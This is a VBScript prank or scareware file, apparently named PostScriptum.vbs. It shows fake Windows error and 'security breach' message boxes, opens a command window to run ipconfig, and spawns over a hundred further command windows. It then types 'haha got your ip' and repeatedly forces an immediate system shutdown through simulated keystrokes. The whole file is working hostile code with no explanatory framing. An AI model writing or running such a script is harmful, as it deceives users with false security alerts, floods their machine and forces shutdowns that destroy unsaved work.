X=MsgBox("The application was unable to start correctly. Code:0xc000007b, Windows detected this file as a virus and closed it to prevent it from harming your device.",5+16,"PostScriptum.vbs - Application Error")
X=MsgBox("Runtime error. Windows detected a harmful file in your system.",0+16,"Harmful file detected")
X=MsgBox("Your security may have been breached. Please change all your account passwords as soon as possible",0+16,"Warning! Security Breach!")
X=MsgBox("Runtime error. Windows detected a harmful file in your system.",0+16,"Harmful file detected")
set shellobj = CreateObject("WScript.Shell")
shellobj.run "cmd"
wscript.sleep 1500
shellobj.sendkeys "i"
wscript.sleep 100
shellobj.sendkeys "p"
wscript.sleep 100
shellobj.sendkeys "c"
wscript.sleep 100
shellobj.sendkeys "o"
wscript.sleep 100
shellobj.sendkeys "n"
wscript.sleep 100
shellobj.sendkeys "f"
wscript.sleep 100
shellobj.sendkeys "i"
wscript.sleep 100
shellobj.sendkeys "g"
wscript.sleep 100
Shellobj.sendkeys "{ENTER}"
set shellobj = CreateObject("WScript.Shell")
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
shellobj.run "cmd"
wscript.sleep 2000
shellobj.sendkeys "h"
wscript.sleep 10
shellobj.sendkeys "a"
wscript.sleep 10
shellobj.sendkeys "h"
wscript.sleep 10
shellobj.sendkeys "a"
wscript.sleep 10
shellobj.sendkeys " "
wscript.sleep 10
shellobj.sendkeys "g"
wscript.sleep 10
shellobj.sendkeys "o"
wscript.sleep 10
shellobj.sendkeys "t"
wscript.sleep 10
shellobj.sendkeys " "
wscript.sleep 10
shellobj.sendkeys "y"
wscript.sleep 10
shellobj.sendkeys "o"
wscript.sleep 10
shellobj.sendkeys "u"
wscript.sleep 10
shellobj.sendkeys "r"
wscript.sleep 10
shellobj.sendkeys " "
wscript.sleep 10
shellobj.sendkeys "i"
wscript.sleep 10
shellobj.sendkeys "p"
wscript.sleep 1000
Shellobj.sendkeys "{ENTER}"
shellobj.run "cmd"
wscript.sleep 1000
shellobj.sendkeys "s"
wscript.sleep 5
Shellobj.sendkeys "h"
wscript.sleep 5
Shellobj.sendkeys "u"
wscript.sleep 5
Shellobj.sendkeys "t"
wscript.sleep 5
Shellobj.sendkeys "d"
wscript.sleep 5
Shellobj.sendkeys "o"
wscript.sleep 5
Shellobj.sendkeys "w"
wscript.sleep 5
Shellobj.sendkeys "n "
wscript.sleep 5
Shellobj.sendkeys "-"
wscript.sleep 5
Shellobj.sendkeys "s "
wscript.sleep 5
Shellobj.sendkeys "-"
wscript.sleep 5
Shellobj.sendkeys "f "
wscript.sleep 5
Shellobj.sendkeys "-"
wscript.sleep 5
Shellobj.sendkeys "t "
wscript.sleep 5
Shellobj.sendkeys "0"
wscript.sleep 5
Shellobj.sendkeys "{ENTER}"
shellobj.run "cmd"
wscript.sleep 1000
shellobj.sendkeys "s"
wscript.sleep 10
Shellobj.sendkeys "h"
wscript.sleep 10
Shellobj.sendkeys "u"
wscript.sleep 10
Shellobj.sendkeys "t"
wscript.sleep 10
Shellobj.sendkeys "d"
wscript.sleep 10
Shellobj.sendkeys "o"
wscript.sleep 10
Shellobj.sendkeys "w"
wscript.sleep 10
Shellobj.sendkeys "n "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "s "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "f "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "t "
wscript.sleep 10
Shellobj.sendkeys "0"
wscript.sleep 10
Shellobj.sendkeys "{ENTER}"
shellobj.run "cmd"
wscript.sleep 1000
shellobj.sendkeys "s"
wscript.sleep 10
Shellobj.sendkeys "h"
wscript.sleep 10
Shellobj.sendkeys "u"
wscript.sleep 10
Shellobj.sendkeys "t"
wscript.sleep 10
Shellobj.sendkeys "d"
wscript.sleep 10
Shellobj.sendkeys "o"
wscript.sleep 10
Shellobj.sendkeys "w"
wscript.sleep 10
Shellobj.sendkeys "n "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "s "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "f "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "t "
wscript.sleep 10
Shellobj.sendkeys "0"
wscript.sleep 10
Shellobj.sendkeys "{ENTER}"
shellobj.run "cmd"
wscript.sleep 1000
shellobj.sendkeys "s"
wscript.sleep 10
Shellobj.sendkeys "h"
wscript.sleep 10
Shellobj.sendkeys "u"
wscript.sleep 10
Shellobj.sendkeys "t"
wscript.sleep 10
Shellobj.sendkeys "d"
wscript.sleep 10
Shellobj.sendkeys "o"
wscript.sleep 10
Shellobj.sendkeys "w"
wscript.sleep 10
Shellobj.sendkeys "n "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "s "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "f "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "t "
wscript.sleep 10
Shellobj.sendkeys "1"
wscript.sleep 10
Shellobj.sendkeys "{ENTER}"
shellobj.run "cmd"
wscript.sleep 1000
shellobj.sendkeys "s"
wscript.sleep 10
Shellobj.sendkeys "h"
wscript.sleep 10
Shellobj.sendkeys "u"
wscript.sleep 10
Shellobj.sendkeys "t"
wscript.sleep 10
Shellobj.sendkeys "d"
wscript.sleep 10
Shellobj.sendkeys "o"
wscript.sleep 10
Shellobj.sendkeys "w"
wscript.sleep 10
Shellobj.sendkeys "n "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "s "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "f "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "t "
wscript.sleep 10
Shellobj.sendkeys "1"
wscript.sleep 10
Shellobj.sendkeys "{ENTER}"
shellobj.run "cmd"
wscript.sleep 1000
shellobj.sendkeys "s"
wscript.sleep 10
Shellobj.sendkeys "h"
wscript.sleep 10
Shellobj.sendkeys "u"
wscript.sleep 10
Shellobj.sendkeys "t"
wscript.sleep 10
Shellobj.sendkeys "d"
wscript.sleep 10
Shellobj.sendkeys "o"
wscript.sleep 10
Shellobj.sendkeys "w"
wscript.sleep 10
Shellobj.sendkeys "n "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "s "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "f "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "t "
wscript.sleep 10
Shellobj.sendkeys "1"
wscript.sleep 10
Shellobj.sendkeys "{ENTER}"
shellobj.run "cmd"
wscript.sleep 1000
shellobj.sendkeys "s"
wscript.sleep 10
Shellobj.sendkeys "h"
wscript.sleep 10
Shellobj.sendkeys "u"
wscript.sleep 10
Shellobj.sendkeys "t"
wscript.sleep 10
Shellobj.sendkeys "d"
wscript.sleep 10
Shellobj.sendkeys "o"
wscript.sleep 10
Shellobj.sendkeys "w"
wscript.sleep 10
Shellobj.sendkeys "n "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "s "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "f "
wscript.sleep 10
Shellobj.sendkeys "-"
wscript.sleep 10
Shellobj.sendkeys "t "
wscript.sleep 10
Shellobj.sendkeys "1"
wscript.sleep 10
Shellobj.sendkeys "{ENTER}"